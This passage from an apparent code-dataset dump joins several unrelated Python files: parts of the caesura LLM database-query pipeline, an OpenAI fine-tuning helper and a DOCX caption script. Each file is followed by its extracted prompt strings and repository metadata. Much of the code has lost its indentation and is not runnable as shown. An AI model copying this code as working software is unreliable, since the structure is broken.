col_map = {int(x[0].split(".")[1]): x[6] for x in col_map}
is_relevant_nums = set()
contains = dict()
reasons = dict()
for a in answers:
num = a.split(" ")[0]
if num == "3.":
continue
i = int(num.split(".")[1])
answer = a[len(num) + 1:]
if num.endswith("3") and "yes" in re.split(r"\W", answer.lower()):
is_relevant_nums.add(i)
if num.endswith("2"):
reasons[i] = answer
elif num.endswith("1"):
contains[i] = answer.split(".")[0].split(", which")[0].strip() + "."
result = {relevant_col_tuple(table_name, col_map[k], v, reasons[k]) for k, v in contains.items()
if k in is_relevant_nums and k in col_map}
return result
def get_relevance_questions(self, table_name):
result = []
i = 1
table = self.database.tables[table_name]
for i, col in enumerate(table.get_columns()):
dtype = table.get_datatype_for_column(col)
if col.endswith("_id"):
continue
r = f"3.{i}.1 What is contained in column {col} (table {table_name}, datatype {dtype}) ?\n" \
f"3.{i}.2 Why or why not is column {table_name}.{col} relevant for the query ({self.get_hint(dtype, 'Data-GPT')})?.\n" \
f"3.{i}.3 Final decision whether column {table_name}.{col} is relevant (Yes / No).\n"
result.append(r)
i += 1
return "\n".join(result)
class RelevantColumns(list):
def __init__(self, database, query, llm):
self.database = database
self.query = query
self.example_values = dict()
self.llm = llm
self.relevant_values_via_index = list()
self.tool_hints = dict()
self.default_hints = dict()
super().__init__()
def __str__(self, with_tool_hints=False, with_join_hints=False, detail_occurrence_limit=2):
if len(self) == 0:
return ""
hints = self.tool_hints if with_tool_hints else self.default_hints
self.set_relevant_values_via_index(self.relevant_values_via_index)
table_occurrences = reduce(lambda a, b: {k: (a.get(k, 0) + b.get(k, 0)) for k in (set(a) | set(b))},
[{c.table: 1} for c in self])
result = "These columns (among others) are potentially relevant:\n"
result += "\n".join(
(f"- The '{c.column}' column of the '{c.table}' table might be relevant. {c.contains} "
f"These are some relevant values for the column: {self.example_values[c]}." + hints.get(c, ""))
for c in self if table_occurrences[c.table] <= detail_occurrence_limit
) + "\n"
short_relevant = [f"{c.table}.{c.column} (example values {self.example_values[c][:2]})"
for c in self if table_occurrences[c.table] > detail_occurrence_limit]
if len(short_relevant):
result += "- The columns " + ", ".join(short_relevant) + " might also be relevant."
if with_join_hints:
result += " " + self.get_join_columns()
return result
def get_join_columns(self):
result = set()
for col in set(c.table for c in self):
result |= self.dfs(col, frozenset(c.table for c in self))
return "\n - These are relevant primary / foreign keys: " + ", ".join(f"{t1}.{t2}"
for t1, t2 in sorted(result, key=lambda x: x[1]))
def dfs(self, table, relevant_tables, path=(), visited=frozenset()):
result = set()
for link in self.database.tables[table].links:
neighbor, neighbor_col = next(iter(
(t.name, c) for t, c in ((link.table1, link.column1), (link.table2, link.column2)) if t.name != table))
if neighbor in visited:
continue
table, table_col = next(iter(
(t.name, c) for t, c in ((link.table1, link.column1), (link.table2, link.column2)) if t.name == table))
step = ((table, table_col), (neighbor, neighbor_col))
this_path = path + step
if neighbor in relevant_tables:
result |= set(this_path)
else:
result |= self.dfs(neighbor, relevant_tables, this_path, visited=frozenset(visited | {table}))
return result
def with_tool_hints(self):
return self.__str__(with_tool_hints=True)
def with_join_hints(self):
return self.__str__(with_join_hints=True)
def __contains__(self, other: object) -> bool:
inside = {(c.table, c.column) for c in self}
return (other.table, other.column) in inside
def append(self, c):
if c in self or c.table not in self.database.tables or \
c.column not in self.database.tables[c.table].data_frame.columns:
return
super().append(c)
if c.table not in self.database.tables or c.column not in self.database.tables[c.table].data_frame.columns:
return
self.example_values[c] = self.database.tables[c.table].data_frame[c.column][:30].unique()[:10].tolist()
if self.database.get_column_datatype(c.table, c.column) == "IMAGE":
self.example_values[c] = self.example_values[c][:3]
self.default_hints[c] = f" You should look at images in {c.table}.{c.column} to figure out what they depict."
self.tool_hints[c] = f" Use Visual Question Answering to look at the images in {c.table}.{c.column} and extract information. Use Image Select to filter rows by what is depicted on the images."
if self.database.get_column_datatype(c.table, c.column) == "TEXT":
self.example_values[c] = self.example_values[c][:3]
self.example_values[c] = ["<TEXT>" for _ in self.example_values[c]]
self.default_hints[c] = f" You should read the texts in {c.table}.{c.column} to figure out what they contain."
self.tool_hints[c] = f" Use Text Question Answering to read the texts in {c.table}.{c.column} and extract information from them."
if self.database.has_relevant_values_index(c.table, c.column):
self.relevant_values_via_index.append(c)
def extend(self, cols):
for c in cols:
self.append(c)
def set_relevant_values_via_index(self, cols):
if len(cols) == 0:
return
prompt = ChatPromptTemplate.from_messages([
SystemMessage(content="Extract potentially relevant keywords from queries given some column names."),
HumanMessage(content="Query: Get the place of birth of every US president.\n"
"Columns: politician.name, politician.country, politician.rank, politician.place_of_birth"),
AIMessage(content="politician.country: US, USA, United States of America\npolitician.rank: president"),
HumanMessage(content="Query: Plot the doses of acetylsalicylic acid for all drugs against "
"fever for each producer.\nColumns: drugs.name, drugs.disease, drugs.active_ingredient, drugs.dose"),
AIMessage(content="drug.disease: fever\ndrugs.active_ingredient: acetylsalicylic acid, ASA"),
HumanMessagePromptTemplate.from_template("Query: {query}\ncolumns: {columns}")
])
columns = ", ".join(f"{c.table}.{c.column}" for c in cols)
chain = LLMChain(llm=self.llm, prompt=prompt)
result = chain.predict(query=self.query, columns=columns)
mapping = {(c.table, c.column): c for c in self}
for line in result.split("\n"):
if ":" not in line:
continue
column, keywords = tuple(x.strip() for x in line.split(":"))
table, column = column.split(".")
if table not in self.database.tables or column not in self.database.tables[table].data_frame.columns:
continue
keywords = [x.strip() for x in keywords.split(",")]
values = self.database.get_relevant_values(table, column, keywords)
self.example_values[mapping[table, column]] = values
self.relevant_values_via_index = []
| [
"2. If a table is requested, what should be the columns of the table? What should be the rows of the table? Answer N/A if not applicable.\n",
"fever for each producer.\nColumns: drugs.name, drugs.disease, drugs.active_ingredient, drugs.dose",
"1. If a plot is requested, what kind of plot is most suitable? What would be the best representation for the requested plot?",
"Columns: politician.name, politician.country, politician.rank, politician.place_of_birth",
"Query: {query}\ncolumns: {columns}",
"{relevance_questions}",
"politician.country: US, USA, United States of America\npolitician.rank: president",
"[PLACEHOLDER, PLACEHOLDER]",
"__global__",
"Query: Plot the doses of acetylsalicylic acid for all drugs against ",
"drug.disease: fever\ndrugs.active_ingredient: acetylsalicylic acid, ASA",
" What exactly is plotted on the X and Y-Axis? Answer N/A if not applicable.\n",
"In order to plan the steps to do, You must answer the following questions as precisely as possible.\n",
"Query: Get the place of birth of every US president.\nColumns: politician.name, politician.country, politician.rank, politician.place_of_birth",
"My request is: {query}.\n",
"Query: Plot the doses of acetylsalicylic acid for all drugs against fever for each producer.\nColumns: drugs.name, drugs.disease, drugs.active_ingredient, drugs.dose",
"My request is: {query}.\nIn order to plan the steps to do, You must answer the following questions as precisely as possible.\n1. If a plot is requested, what kind of plot is most suitable? What would be the best representation for the requested plot? What exactly is plotted on the X and Y-Axis? Answer N/A if not applicable.\n2. If a table is requested, what should be the columns of the table? What should be the rows of the table? Answer N/A if not applicable.\n{relevance_questions}",
"Extract potentially relevant keywords from queries given some column names.",
"Query: Get the place of birth of every US president.\n"
] |
2024-01-10 | DataManagementLab/caesura | caesura~observations.py | from langchain.prompts.chat import HumanMessagePromptTemplate
class Observation(Exception):
def __init__(self, *, description=None, step_nr=None, add_step_nr=None, target_phase=None,
plan_step_info=None):
self.description = description
self.step_nr = step_nr
self.add_step_nr = add_step_nr
self.target_phase = target_phase
self.handled = False
self.plan_step_info = plan_step_info
def set_target_phase(self, target_phase):
self.target_phase = target_phase
def __str__(self):
result = f"Observation{(' from Step ' + str(self.step_nr)) if self.step_nr is not None else ''}. "
if self.description:
result += self.description
return result
def set_step_number(self, i):
if self.add_step_nr:
self.step_nr = i
def get_message(self, suffix=None):
msg = str(self)
if suffix:
msg += " " + suffix
prompt = HumanMessagePromptTemplate.from_template(msg)
if len(prompt.input_variables) == 0:
return prompt.format()
return prompt
class ExecutionError(Observation):
def __init__(self, *, description=None, step_nr=None, original_error=None, add_step_nr=True, target_phase=None):
self.description = description
self.original_error = original_error
self.step_nr = step_nr
self.add_step_nr = add_step_nr
self.fix_idea = None
self.target_phase = target_phase
self.handled = False
def set_fix_idea(self, fix_idea):
self.fix_idea = fix_idea
def __str__(self):
result = f"Something went wrong{(' in Step ' + str(self.step_nr)) if self.step_nr is not None else ''}! "
if self.original_error:
result += f"{type(self.original_error).__name__}({self.original_error}). "
if self.description:
result += self.description + " "
if self.fix_idea:
result += "\nThis is how it can be fixed: " + self.fix_idea
return result.strip()
class PlanFinished(Observation):
def __init__(self):
pass
def __str__(self):
return "Plan successfully executed!"
| [] |
2024-01-10 | DataManagementLab/caesura | caesura~tools~python.py | import re
import importlib
import logging
from langchain import LLMChain, PromptTemplate
from caesura.database.database import Database, Table
from caesura.observations import Observation
from caesura.tools.base_tool import BaseTool
from caesura.observations import ExecutionError
from langchain.schema import SystemMessage, AIMessage, HumanMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, AIMessagePromptTemplate
logger = logging.getLogger(__name__)
IMPORTS = ["pandas", "datetime", "numpy", "re"]
IMPORT_REGEX = r"(from \w+ |)import (\w+)( as \w+|)"
class TransformTool(BaseTool):
name = "Python"
description = (
"Transform the values for a certain column using python. Can be used to transform dates, numbers etc, or to extract data from semi-structured documents. "
"Three input arguments: (column to transform; new name for the transformed column; natural language explanation of the python code to be executed). "
"For example: (date_of_birth; month_of_birth; extract the month from the dates) "
"Cannot deal columns of type IMAGE or TEXT. Cannot filter rows. Has only access to the libraries " + ",".join(IMPORTS) + ".\n"
)
args = ("column to transform", "new name for the transformed column", "natural language explanation of the python code to be executed")
def __init__(self, database: Database, llm, interactive: bool):
super().__init__(database)
self.llm = llm
self.interactive = interactive
def run(self, tables, input_args, output):
"""Use the tool."""
table = tables[0]
column, new_name, explanation = tuple(input_args)
if "." in column:
table, column = column.split(".")
ds = self.database.get_table_by_name(table)
if column in ds.image_columns:
raise ExecutionError(description="Python cannot be called on columns of IMAGE datatype. "
"For these columns, use the other tools, e.g. Visual Question Answering")
if column in ds.text_columns:
raise ExecutionError(description="Python cannot be called on columns of TEXT datatype. "
"For these columns, use the other tools, e.g. Text Question Answering.")
df, func_str = self.execute_python(ds, column, new_name, explanation)
result = Table(
output if output is not None else table, df,
f"Result of Python: table={table}, column={column}, new_column={new_name}, code={explanation}",
parent=ds
)
# Add the result to the working memory
observation = self.database.register_working_memory(result, peek=[new_name])
observation = Observation(description=observation, plan_step_info=func_str)
return observation
def execute_python(self, ds, column, new_name, explanation):
if column not in ds.data_frame.columns:
raise ExecutionError(description=f"Column {column} does not exist in table {ds.name}.")
chat_thread = []
i = 0
while True:
try:
func, dtype, func_str = self.get_func(explanation, ds.data_frame[column][:10],
chat_thread=chat_thread, column=column, new_column=new_name)
df = ds.data_frame.copy()
df[new_name] = df[column].apply(func).astype(dtype)
return df, func_str
except Exception as e:
if i >= 3:
raise ExecutionError(description="Python tool failed. Use another tool!")
chat_thread = self.handle_errors(chat_thread=chat_thread, error=e, request=explanation)
i += 1
def get_func(self, explanation, data, chat_thread, column, new_column):
modules = ", ".join(IMPORTS)
params = dict(explanation=explanation, data=str(data), modules=modules, column=column, new_column=new_column)
if len(chat_thread) == 0: # Start of conversation
chat_thread.append(
HumanMessagePromptTemplate.from_template(
"{explanation}:\n```py\n>>> print({column}[:10])\n{data}\n```\n"
"It is a pandas Series object. Please call the 'apply' method with a lambda expression, "
"and make sure to always call astype() in the same line. Assign the result to a variable called '{new_column}'. "
"Template to use: `{new_column} = {column}.apply(lambda x: <code>).astype(<dtype>)`. You can use {modules}."
).format(**params))
prompt = ChatPromptTemplate.from_messages(chat_thread)
chain = LLMChain(llm=self.llm, prompt=prompt)
result = chain.predict().strip()
chat_thread.append(AIMessage(content=result))
match = re.search(fr"{new_column} = (\w+\[\"|\w+\['|){column}(\"\]|'\]|)\.apply\((.*)\)\.astype\((.*)\)", result)
if match is None:
raise ValueError(f"Use correct template: `{new_column} = {column}.apply(lambda x: <code>).astype(<dtype>)`")
code, dtype = match[3], match[4]
functions = self.parse_function_definitions(result)
function_str = "\n".join(functions)
function_str = f"{function_str}{column}.apply({code}).astype({dtype})"
if self.interactive and not next(iter(
input(f"\nSecurity-Check: Is >>> {function_str} <<< fine (Y,n) ? > ")
), "y").lower() == "y":
exit(0)
loc = self.manage_imports(result, functions)
func = eval(code, loc) # get function handler
dtype = eval(dtype, loc)
return func, dtype, function_str
def parse_function_definitions(self, result):
functions = list()
for m in re.finditer(r"( *)def (\w+)\(.*\):.*(\n\1 .*)+", result):
indent = len(m[1])
func = "\n".join(l[indent:] for l in m[0].split("\n"))
if not re.search(IMPORT_REGEX, func):
functions.append(func + "\n")
return functions
def manage_imports(self, result, functions):
if "```" in result:
result = result.split("```")[1]
loc = {m: importlib.import_module(m) for m in IMPORTS}
for from_stmt, module, alias in re.findall(IMPORT_REGEX, result):
from_stmt = [x for x in from_stmt[5:].strip().split(".") if x]
alias = alias[4:].strip() or module
module = from_stmt + [module]
target = loc[module[0]]
for m in module[1:]:
target = getattr(target, m)
loc[alias] = target
for f in functions:
exec(f, loc)
return loc
def handle_errors(self, chat_thread, error, request):
error_str = f"{type(error).__name__}({error})"
code = re.search(fr"\w+ = (\w+\[\"|\w+\['|)\w+(\"\]|'\]|)\.apply\((.*)\)\.astype\((.*)\)", chat_thread[-1].content)
code = code[0] if code is not None else "<could not parse code with template>"
prompt = ChatPromptTemplate.from_messages([
*chat_thread,
HumanMessagePromptTemplate.from_template(
"Something went wrong executing `{code}`. This is the error I got: {error}. "
"Can you answer me these four questions:\n"
"1. What is the reason for the error?\n"
"2. Is there another way to '{request}', potentially using another library (from {libraries})?\n."
"3. Can this be fixed? Or is there something wrong in my request? Answer 'Yes' if it can be fixed, and 'No' otherwise.\n"
"4. If it can be fixed, how can it be fixed? If it cannot be fixed, please explain the error and why it cannot be implemented using python.\n"
"5. Write fixed code, if possible."
),
AIMessage(content="I'm sorry that the executed code failed. Here are the answers to the questions:\n1.")
])
libraries = ", ".join(IMPORTS)
chain = LLMChain(llm=self.llm, prompt=prompt)
logger.warning(prompt.format(error=error_str, code=code, libraries=libraries, request=request))
result = chain.predict(error=error_str, code=code, libraries=libraries, request=request, stop=["\n5."])
logger.warning(result)
explanation, _, can_be_fixed, description = \
tuple(x.strip() for x in re.split(r"(\n2\.|\n3\.|\n4\.)", result)[slice(0, None, 2)])
can_be_fixed = "yes" in re.split(r"\W", can_be_fixed.lower())
if "```" in description:
description = description.split("```")[0]
description = ".".join(description.split(".")[:-1]) + "."
if not can_be_fixed:
raise ExecutionError(description=description, original_error=error)
prompt = ChatPromptTemplate.from_messages([
*chat_thread,
HumanMessagePromptTemplate.from_template(
"Something went wrong executing `{code}`. This is the error I got: {error}. "
"{explanation} Please fix it, but make sure you adhere to the template! This is how you could do it: {fix_idea}"
),
]).format_prompt(error=error_str, code=code, explanation=explanation, fix_idea=description)
return prompt.messages
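# A minimal, self-contained sketch of the template match performed in get_func above; the sample
# reply, the column name ("report") and the new column name ("num_moves") are made up for illustration.
if __name__ == "__main__":
    import re
    import pandas as pd
    sample_reply = "num_moves = report.apply(lambda x: len(x.split())).astype(int)"
    m = re.search(r"num_moves = (\w+\[\"|\w+\['|)report(\"\]|'\]|)\.apply\((.*)\)\.astype\((.*)\)", sample_reply)
    code, dtype = m[3], m[4]                 # "lambda x: len(x.split())" and "int"
    func, typ = eval(code), eval(dtype)      # same eval step as get_func
    reports = pd.Series(["e4 e5 Nf3 Nc6", "d4 d5 c4"])
    print(reports.apply(func).astype(typ))   # counts 4 and 3 moves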
| [
"Something went wrong executing `{code}`. This is the error I got: {error}. {explanation} Please fix it, but make sure you adhere to the template! This is how you could do it: {fix_idea}",
"3. Can this be fixed? Or is there something wrong in my request? Answer 'Yes' if it can be fixed, and 'No' otherwise.\n",
"I'm sorry that the executed code failed. Here are the answers to the questions:\n1.",
"1. What is the reason for the error?\n",
"Can you answer me these four questions:\n",
"4. If it can be fixed, how can it be fixed? If it cannot be fixed, please explain the error and why it cannot be implemented using python.\n",
"Something went wrong executing `{code}`. This is the error I got: {error}. ",
"2. Is there another way to '{request}', potentially using another library (from {libraries})?\n.",
"{explanation} Please fix it, but make sure you adhere to the template! This is how you could do it: {fix_idea}",
"5. Write fixed code, if possible.",
"Something went wrong executing `{code}`. This is the error I got: {error}. Can you answer me these four questions:\n1. What is the reason for the error?\n2. Is there another way to '{request}', potentially using another library (from {libraries})?\n.3. Can this be fixed? Or is there something wrong in my request? Answer 'Yes' if it can be fixed, and 'No' otherwise.\n4. If it can be fixed, how can it be fixed? If it cannot be fixed, please explain the error and why it cannot be implemented using python.\n5. Write fixed code, if possible."
] |
2024-01-10 | DataManagementLab/caesura | caesura~phases~planning.py | import logging
import re
from langchain import LLMChain
from caesura.capabilities import ALL_CAPABILITIES
from langchain.schema import AIMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, AIMessagePromptTemplate, SystemMessagePromptTemplate
from caesura.phases.base_phase import ExecutionOutput, Phase
from caesura.phases.discovery import DiscoveryPhase
from caesura.observations import ExecutionError
from caesura.plan import Plan, PlanStep
logger = logging.getLogger(__name__)
INIT_PROMPT = "My request is: {query}. {relevant_columns}."
REINIT_PROMPT = "{relevant_columns} Take these updated relevant values into account when fixing the error!"
EXAMPLE_PLAN = """
Example plan for database containing 'patient' and 'patient_reports' tables:
Request: Plot the average patient age for each diagnosis.
Step 1: Join the 'patient' and the 'patient_reports' table on the 'patient_id' column to combine the two tables.
Input: patient, patient_reports
Output: joined_patient_table
New Columns: N/A
Step 2: Extract the diagnosis for each patient from the 'report' column in the 'joined_patient_table' table.
Input: joined_patient_table
Output: N/A
New Columns: diagnosis
Step 3: Group the 'joined_patient_table' by diagnosis and aggregate the 'age' column using the mean.
Input: joined_patient_table
Output: result_table
New Columns: mean_age
Step 4: Plot the 'result_table' in a bar plot. The 'diagnosis' should be on the X-axis and the 'mean_age' on the Y-Axis.
Input: result_table
Output: N/A
New Columns: N/A
Step 5: Plan completed.
Example plan for database containing 'pictures' and a 'metadata' table:
Request: Get the number of pictures that depict a skateboard per epoch.
Step 1: Select all rows of the 'pictures' table where the 'image' column depicts a skateboard.
Input: pictures
Output: skateboard_pictures
New Columns: N/A
Step 2: Join the 'pictures' and the 'metadata' tables on the 'picture_path' column.
Input: pictures, metadata
Output: joined_table
New Columns: N/A
Step 3: Group by the 'epoch' column and count the number of rows.
Input: joined_table
Output: result
New Columns: num_pictures
Step 4: Plan completed.
Example plan for database containing tables 'building' and 'surveillance':
Request: Construct a table containing the highest number of persons depicted in a surveillance image per building.
Step 1: Join the 'building' table with the 'surveillance' table on the 'building_id' column.
Input: building, surveillance
Output: joined_table
New Columns: N/A
Step 2: Extract the number of depicted persons for each image in the 'image' column of the 'joined_table' table.
Input: joined_table
Output: N/A
New Columns: num_depicted_persons
Step 3: Group the 'joined_table' table by 'building_name' and aggregate the 'num_depicted_persons' column using the maximum.
Input: joined_table
Output: final_result
New Columns: max_num_depicted_persons
Step 4: Plan completed.
Example plan for chess database for a chess tournament. It has two tables 'chess_game_reports' and 'participating_players'.
Request: What is the highest number of moves in a chess game for each player.
Step 1: Join the 'chess_game_reports' and the 'participating_players' on the 'player_id' column.
Input: chess_game_reports, participating_players
Output: joined_table
New Columns: N/A
Step 2: Extract the number of moves from the chess game reports.
Input: joined_table
Output: N/A
New Columns: num_moves
Step 3: Group by 'player_name' and compute the maximum of 'num_moves'.
Input: joined_table
Output: result_table
New Columns: max_num_moves
Step 4: Plan completed.
"""
class PlanningPhase(Phase):
def create_prompt(self):
result = ChatPromptTemplate.from_messages([
self.system_prompt(),
HumanMessagePromptTemplate.from_template(INIT_PROMPT),
AIMessagePromptTemplate.from_template("Request: {query}\nThought:")
])
return result
def system_prompt(self):
result = "You are Data-GPT and you generate plans to retrieve data from databases:\n"
result += EXAMPLE_PLAN + "\n\n"
result += self.database.describe()
result += "You have the following capabilities:\n"
result += "\n".join([c.description for c in ALL_CAPABILITIES])
result += "\n" + FORMAT_INSTRUCTIONS
return SystemMessagePromptTemplate.from_template(result)
def init_chat(self, query, relevant_columns, **kwargs):
return self.create_prompt().format_prompt(query=query, relevant_columns=relevant_columns.with_join_hints()).messages
def execute(self, chat_history, **kwargs):
prompt = ChatPromptTemplate.from_messages(chat_history)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
ai_output = llm_chain.predict()
chat_history += [AIMessage(content=ai_output)]
plan = self.parse_plan(ai_output)
logger.info(plan)
return ExecutionOutput(
state_update={"plan": plan},
chat_history=chat_history,
)
def handle_observation(self, observation, chat_history, **kwargs):
msg = observation.get_message(suffix= \
"\nTo systematically fix this issue, answer the following questions one by one:\n"
"1. What are potential causes for this error? Think step by step.\n"
"2. Explain in detail how this error could be fixed.\n"
"3. Are there additional relevant columns necessary to fix the error(Yes / No)?\n"
)
prompt = ChatPromptTemplate.from_messages(chat_history + [msg])
chain = LLMChain(llm=self.llm, prompt=prompt)
answers = chain.predict()
logger.warning(observation)
logger.warning(answers)
_, fix_idea, additional_cols_str = \
[x.strip() for x in re.split(r"(^1\.|\n2\.|\n3\.)", answers)[slice(2, None, 2)]]
additional_cols = "yes" in re.split(r"\W", additional_cols_str.lower())
if additional_cols:
which_info = re.search(r"(^|\W)((Y|y)es)\W+(\w.+)\W", additional_cols_str)[4].strip(" .")
raise ExecutionError(description=f"This information is missing: {which_info}",
target_phase=DiscoveryPhase)
observation.set_fix_idea(fix_idea)
chat_history.append(observation.get_message(suffix="\nPlease come up with a fixed plan."))
return chat_history
def reinit_chat(self, observation, chat_history, query, relevant_columns, **kwargs):
chat_history.append(observation.get_message(suffix="\nPlease come up with a fixed plan."))
chat_history.append(HumanMessagePromptTemplate.from_template(REINIT_PROMPT))
chat_history = ChatPromptTemplate.from_messages(chat_history).format_prompt(
relevant_columns=relevant_columns.with_join_hints()
).messages
return chat_history
def parse_plan(self, plan):
available_tables = set(self.database.tables.keys())
result = []
plan = plan.split("\n")
current_step = None
for step in plan:
if step.startswith("Step"):
if current_step is not None:
result.append(current_step)
step_str = ":".join(step.split(":")[1:]).strip()
current_step = PlanStep(step_str, available_tables=available_tables)
if step.startswith("Input"):
step_str = ":".join(step.split(":")[1:]).strip()
current_step.set_input(step_str.split(","))
if step.startswith("Output"):
step_str = ":".join(step.split(":")[1:]).strip()
if step_str != "N/A":
current_step.set_output(step_str)
available_tables.add(step_str)
if step.startswith("New Columns"):
step_str = ":".join(step.split(":")[1:]).strip()
if step_str != "N/A":
current_step.set_new_columns(step_str.split(","))
if current_step is not None and current_step.input_tables != []:
result.append(current_step)
result = self.filter_steps(result)
return Plan(result)
def filter_steps(self, steps):
forbidden = {"verify", "make sure", "confirm", "test", "validate", "if", "in case", "double-check", "check"}
steps = [
s for s in steps
if not any(s.description.lower().startswith(prefix) for prefix in forbidden) and len(s.input_tables) > 0
]
return steps
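# A standalone sketch of the line-based parsing done in parse_plan above, applied to an assumed
# model output that follows FORMAT_INSTRUCTIONS; plain dicts stand in for the PlanStep/Plan objects.
def _sketch_parse_plan(text):
    steps, current = [], None
    for line in text.split("\n"):
        value = ":".join(line.split(":")[1:]).strip()
        if line.startswith("Step"):
            if current is not None:
                steps.append(current)
            current = {"description": value, "input": [], "output": None, "new_columns": []}
        elif line.startswith("Input"):
            current["input"] = [t.strip() for t in value.split(",")]
        elif line.startswith("Output") and value != "N/A":
            current["output"] = value
        elif line.startswith("New Columns") and value != "N/A":
            current["new_columns"] = [c.strip() for c in value.split(",")]
    if current is not None and current["input"]:
        steps.append(current)
    return steps
# _sketch_parse_plan("Step 1: Join 'pictures' and 'metadata' on 'picture_path'.\n"
#                    "Input: pictures, metadata\nOutput: joined_table\nNew Columns: N/A\n"
#                    "Step 2: Plan completed.")
# -> one parsed step; the "Plan completed." line is dropped because it has no Input tables.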
FORMAT_INSTRUCTIONS = """
Use the following format:
Request: The user request you must satisfy by using your capabilities
Thought: You should always think what to do.
Step 1: Description of the step.
Input: List of tables passed as input. Usually this is a single table, except when tables need to be combined using a join.
Output: Name of the output table. N/A if there is no output e.g. when plotting.
New Columns: The new columns that have been added to the dataset. N/A if no column has been added.
... (this Step/Input/Output/New Columns can repeat N times)
Step N: Plan completed.
""" | [
"My request is: {query}. {relevant_columns}.",
"{relevant_columns} Take these updated relevant values into account when fixing the error!",
"Request: {query}\nThought:"
] |
2024-01-10 | virtualdude1/PlotGenerator | finetune.py | import requests
import openai
from pprint import pprint
with open('openaiapikey.txt', 'r') as infile:
open_ai_api_key = infile.read().strip()  # drop any trailing newline so the Bearer header stays valid
openai.api_key = open_ai_api_key
def file_upload(filename, purpose='fine-tune'):
resp = openai.File.create(purpose=purpose, file=open(filename, "rb"))  # the Files API expects a binary file handle
pprint(resp)
return resp
def file_list():
resp = openai.File.list()
pprint(resp)
def finetune_model(fileid, suffix, model='davinci'):
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
payload = {'training_file': fileid, 'model': model, 'suffix': suffix}
resp = requests.request(method='POST', url='https://api.openai.com/v1/fine-tunes', json=payload, headers=header, timeout=45)
pprint(resp.json())
def finetune_list():
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
resp = requests.request(method='GET', url='https://api.openai.com/v1/fine-tunes', headers=header, timeout=45)
pprint(resp.json())
def finetune_events(ftid):
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
resp = requests.request(method='GET', url='https://api.openai.com/v1/fine-tunes/%s/events' % ftid, headers=header, timeout=45)
pprint(resp.json())
def finetune_get(ftid):
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
resp = requests.request(method='GET', url='https://api.openai.com/v1/fine-tunes/%s' % ftid, headers=header, timeout=45)
pprint(resp.json())
#resp = file_upload('synopses.jsonl')
#finetune_model(resp['id'], 'synopses', 'davinci')
finetune_list()
#openai.FineTune.cancel("ft-2ZxHjUVe5DpqK2EsYyA0YtKz") | [] |
2024-01-10 | wiiiktor/resume | script-1-Graphic-captions.py | import os
import docx
from dotenv import load_dotenv, find_dotenv
from pprint import pprint
from langchain.chat_models import ChatOpenAI
from langchain.prompts import PromptTemplate
from langchain.chains.llm import LLMChain
load_dotenv(find_dotenv())
def read_docx(filename: str) -> str:
"""Reads a DOCX file and returns its content as a string."""
doc = docx.Document(filename)
return '\n'.join(para.text for para in doc.paragraphs)
def get_files_from_dir(dir_path: str) -> list:
"""Returns a list of files in a given directory."""
return [os.path.join(dir_path, file_path) for file_path in os.listdir(dir_path) if
os.path.isfile(os.path.join(dir_path, file_path))]
def main():
DOCX_PATH = 'data/'
list_of_files = get_files_from_dir(DOCX_PATH)
chat = ChatOpenAI(temperature=0, model_name="gpt-4", max_tokens=700)
text = read_docx(list_of_files[0])
num_graphics = text.count("graphic-number")
template = """
In a document you will find {num_graphics} codes in a format
graphic-number-xxx where xxx are three integers.
For example graphic-number-003.
Your aim is to make a brief summary of the text around the codes,
especially in a paragraph just before the text.
You provide a reply in a format:
("graphic-number-001": "description to the graphic")
Document: {document}
"""
prompt = PromptTemplate(
input_variables=["num_graphics", "document"],
template=template
)
chain = LLMChain(llm=chat, prompt=prompt)
captions = chain.run(document=text, num_graphics=num_graphics)
pprint(captions, width=150)
if __name__ == "__main__":
main()
'''
example output:
('("graphic-number-001": "This graphic likely illustrates the tools needed for the installation process, as it is mentioned after the list of required tools.")\n'
'("graphic-number-002": "This graphic likely shows how to position the bike for the installation process, as it is mentioned in the context of positioning the bike with wheels upwards.")\n'
'("graphic-number-003": "This graphic likely demonstrates the process of removing front cranks from the bike, as it is mentioned in the context of crank and front derailleur removal.")\n'
'("graphic-number-004": "This graphic likely shows the bottom bracket that comes with the GTRO, as it is mentioned in the context of bottom bracket replacement.")\n'
'("graphic-number-005": "This graphic likely shows the positioning of the wave-spring in the bottom bracket’s niche, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-006": "This graphic likely shows the positioning of the wave-spring in the bottom bracket’s niche, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-007": "This graphic likely shows the positioning of the reaction lever on the chainstay, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-008": "This graphic likely shows the correct positioning of the lever against the straight area of the chainstay or kickstand plate, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-009": "This graphic likely shows the incorrect positioning of the lever against the edge of the kickstand’s plate, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-010": "This graphic likely shows the incorrect positioning of the lever against the edge of the kickstand’s plate, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-011": "This graphic likely shows the correct positioning of the shifting cable against the down tube, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-012": "This graphic likely shows the correct positioning of the reaction lever against the chainstay, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-013": "This graphic likely shows the installation of the cable-slider, as it is mentioned in the context of cable-slider installation.")\n'
'("graphic-number-014": "This graphic likely shows the installation of the GTRO’s shifter on the handlebar, as it is mentioned in the context of shifter installation.")\n'
'("graphic-number-015": "This graphic likely shows the installation of the GTRO’s shifter on the handlebar, as it is mentioned in the context of shifter installation.")\n'
'("graphic-number-016": "This graphic likely shows the installation of the GTRO’s shifter on the handlebar, as it is mentioned in the context of shifter installation.")\n'
'("graphic-number-017": "This graphic likely shows the installation of the lever to the pedal boom for bicycles with no chainstay, as it is mentioned in the context of no-chainstay bicycles.")\n'
'("graphic-number-018": "This graphic likely shows the application of grease under the plastic cap of the crank bolt for usage in wet/humid areas, as it is mentioned in the context of GTRO usage in highly wet/humid area.")\n'
'("graphic-number-019": "This graphic likely shows the installation of bolts for the adapter, as it is mentioned in the context of adapter for beltring or larger chainring.")')
'''
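# A small standalone helper sketch (not used by main above): it assumes the model reply follows the
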